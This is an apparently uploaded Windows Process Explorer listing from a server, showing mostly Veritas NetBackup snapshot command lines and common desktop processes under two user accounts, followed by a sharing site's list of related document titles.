bck_1514957409 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 286175 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 4968 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1515031202 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 287214 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 6.096 K 204 K 1912 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1515043811 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 287214 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 5.892 K 444 K 916 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1515117602 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 288276 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 5.892 K 444 K 6296 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1515130212 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 288276 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 5.892 K 464 K 4264 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1515204002 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 289300 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 5.892 K 448 K 3792 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1515216610 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 289300 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 5.892 K 464 K 4924 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1515290402 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Weekly_Full -fso -S cmsla-bk13v.cms.colt
-jobid 290333 -WOFB -fim VSS -nbu_version 135266304 -application_consistent 1
NT AUTHORITY\SYSTEM
bpfis.exe 5.892 K 464 K 7272 Symantec Corporation "C:\Program
Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id tesla-as06-
bck_1515303010 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt tesla-
as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Weekly_Full -fso -S cmsla-bk13v.cms.colt
-jobid 290333 -WOFB -fim VSS -nbu_version 135266304 -application_consistent 1
NT AUTHORITY\SYSTEM
bpfis.exe 5.892 K 11.560 K 5240 Symantec Corporation
"C:\Program Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id
tesla-as06-bck_1515376802 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt
tesla-as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 291336 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
bpfis.exe 5.892 K 11.592 K 2940 Symantec Corporation
"C:\Program Files\Veritas\NetBackup\bin\bpfis.exe" create -nbu -owner NBU -id
tesla-as06-bck_1515389410 -bpstart_to 600 -bpend_to 600 -backup_copy 0 -pt 13 -clnt
tesla-as06-bck -fscp 1 -fscp_cksv 0 -ru root -rg root -class
IT_OCN47107_2WEEKS_TESI_WIN_SUN_4AM -sched Daily_Incremental -fso -S cmsla-
bk13v.cms.colt -jobid 291336 -WOFB -fim VSS -nbu_version 135266304
-application_consistent 1 NT AUTHORITY\SYSTEM
explorer.exe 12.636 K 23.012 K 3716 Windows Explorer Microsoft
Corporation C:\WINDOWS\Explorer.EXE TESLA-AS06\lantonelli
vmtoolsd.exe 0.77 4.372 K 11.032 K 5096 VMware Tools Core Service
VMware, Inc. "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n
vmusr TESLA-AS06\lantonelli
ctfmon.exe 1.052 K 4.168 K 7920 CTF Loader Microsoft Corporation
"C:\WINDOWS\system32\ctfmon.exe" TESLA-AS06\lantonelli
ctfmon.exe 800 K 3.216 K 6400 CTF Loader Microsoft Corporation
"C:\WINDOWS\system32\ctfmon.exe" TESLA-AS06\lantonelli
UnlockerAssistant.exe 1.012 K 4.092 K 6352 "C:\Program
Files (x86)\Unlocker\UnlockerAssistant.exe" TESLA-AS06\lantonelli
reader_sl.exe 1.116 K 4.296 K 6392 Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated "C:\Program Files (x86)\Adobe\Reader
9.0\Reader\Reader_sl.exe" TESLA-AS06\lantonelli
explorer.exe 11.960 K 22.312 K 5868 Windows Explorer Microsoft
Corporation C:\WINDOWS\Explorer.EXE TESLA-AS06\alia
vmtoolsd.exe 4.348 K 10.632 K 5788 VMware Tools Core Service
VMware, Inc. "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n
vmusr TESLA-AS06\alia
doublecmd.exe 29.272 K 27.072 K 3904 Double Commander is a cross
platform open source file manager with two panels side by side "D:\Double
Commander\doublecmd.exe" TESLA-AS06\alia
procexp.exe 1.476 K 5.068 K 1232 Sysinternals Process Explorer
Sysinternals - www.sysinternals.com "D:\ProcessExplorer\procexp.exe" TESLA-
AS06\alia
procexp64.exe 1.54 33.884 K 43.000 K 6656 Sysinternals Process Explorer
Sysinternals - www.sysinternals.com "D:\ProcessExplorer\procexp.exe" TESLA-
AS06\alia
reader_sl.exe 1.088 K 3.992 K 2904 Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated "C:\Program Files (x86)\Adobe\Reader
9.0\Reader\Reader_sl.exe" TESLA-AS06\alia
UnlockerAssistant.exe 976 K 3.692 K 6376 "C:\Program Files
(x86)\Unlocker\UnlockerAssistant.exe" TESLA-AS06\alia
AdobeARM.exe 2.904 K 6.380 K 7976 Adobe Reader and Acrobat
Manager Adobe Systems Incorporated "C:\Program Files (x86)\Common
Files\Adobe\ARM\1.0\AdobeARM.exe" TESLA-AS06\alia

Backdoor
No ratings yet
Backdoor
4 pages
Zenoss@zenoss: Wmic - U Emeaad//zenwmi%pass //wdmsitse03.ancy - Fr.sopra "SELECT FROM Win32 - Service"
No ratings yet
Zenoss@zenoss: Wmic - U Emeaad//zenwmi%pass //wdmsitse03.ancy - Fr.sopra "SELECT FROM Win32 - Service"
12 pages
PowerShell Get-Service Commands
No ratings yet
PowerShell Get-Service Commands
4 pages
Registry
No ratings yet
Registry
14 pages
Prezent Are
No ratings yet
Prezent Are
4 pages
Services
No ratings yet
Services
28 pages
Process Explorer Utility
No ratings yet
Process Explorer Utility
13 pages
SDMT Florero 1 03 0203 02539
No ratings yet
SDMT Florero 1 03 0203 02539
32 pages
2 Memory Analysis
100% (1)
2 Memory Analysis
186 pages
How To Detect and Remove Malware
No ratings yet
How To Detect and Remove Malware
8 pages
Process
No ratings yet
Process
4 pages
Optimize Windows 10 Services Guide
No ratings yet
Optimize Windows 10 Services Guide
16 pages
Log
No ratings yet
Log
25 pages
Powerdown Activity - Servers Shutdown Process
No ratings yet
Powerdown Activity - Servers Shutdown Process
16 pages
Equipo Generico
No ratings yet
Equipo Generico
202 pages
Services 1
No ratings yet
Services 1
5 pages
SH
No ratings yet
SH
15 pages
Diagnostico Proxy
No ratings yet
Diagnostico Proxy
199 pages
Activity
No ratings yet
Activity
124 pages
Windows 7 Ultimate System Specs
No ratings yet
Windows 7 Ultimate System Specs
73 pages
Proc List
No ratings yet
Proc List
13 pages
Proc List
No ratings yet
Proc List
9 pages
Process List
No ratings yet
Process List
177 pages
Report
No ratings yet
Report
57 pages
Port
No ratings yet
Port
10 pages
Host Name: OS Name: OS Version: OS
No ratings yet
Host Name: OS Name: OS Version: OS
1,777 pages
TW 2
No ratings yet
TW 2
1 page
WARNING (3) : Can't Get Process 0x14e4 Status
No ratings yet
WARNING (3) : Can't Get Process 0x14e4 Status
210 pages
Windowsattacks
No ratings yet
Windowsattacks
78 pages
Desktop 3K14FBP
No ratings yet
Desktop 3K14FBP
41 pages
The Windows Process Journey
No ratings yet
The Windows Process Journey
28 pages
Threat Hunting
No ratings yet
Threat Hunting
126 pages
Log Steganos OKAYFREEDOM
No ratings yet
Log Steganos OKAYFREEDOM
28 pages
Windows Process Details
No ratings yet
Windows Process Details
240 pages
Upd 2
No ratings yet
Upd 2
9 pages
Proc List
No ratings yet
Proc List
9 pages
Hta-W05-Tracking Hackers On Your Network With Sysinternals Sysmon PDF
No ratings yet
Hta-W05-Tracking Hackers On Your Network With Sysinternals Sysmon PDF
39 pages
Network
No ratings yet
Network
90 pages
Process
No ratings yet
Process
8 pages
Sentinel One DV Chea 2
No ratings yet
Sentinel One DV Chea 2
2 pages
Windows 8.1 Registry Report 2019
No ratings yet
Windows 8.1 Registry Report 2019
27 pages
Net Start New
No ratings yet
Net Start New
3 pages
Windows Privilege Escalation
100% (1)
Windows Privilege Escalation
30 pages
Test IP
No ratings yet
Test IP
12 pages
Windows Services List and Descriptions
No ratings yet
Windows Services List and Descriptions
48 pages
Process List
No ratings yet
Process List
16 pages
192 168 56 1 Windows Report 10oct2023 PCIDSS v3.2.1
No ratings yet
192 168 56 1 Windows Report 10oct2023 PCIDSS v3.2.1
43 pages
System Specs for Tech Enthusiasts
No ratings yet
System Specs for Tech Enthusiasts
30 pages
Auto Runs
No ratings yet
Auto Runs
22 pages
Ttcyk-Wasvt02-Cpu-2025 03 19-19 22 11
No ratings yet
Ttcyk-Wasvt02-Cpu-2025 03 19-19 22 11
1 page
OkayFreedom VPN User Info
No ratings yet
OkayFreedom VPN User Info
25 pages
Prev
No ratings yet
Prev
1,047 pages
GF Excpt
No ratings yet
GF Excpt
22 pages
RDS & XenApp Internals
No ratings yet
RDS & XenApp Internals
39 pages
Report
No ratings yet
Report
34 pages
Otl
No ratings yet
Otl
18 pages

CMD Exe

Uploaded by

CMD Exe

Uploaded by

Process CPU Private Bytes Working Set PID Description Company Name

Command Line User Name

You might also like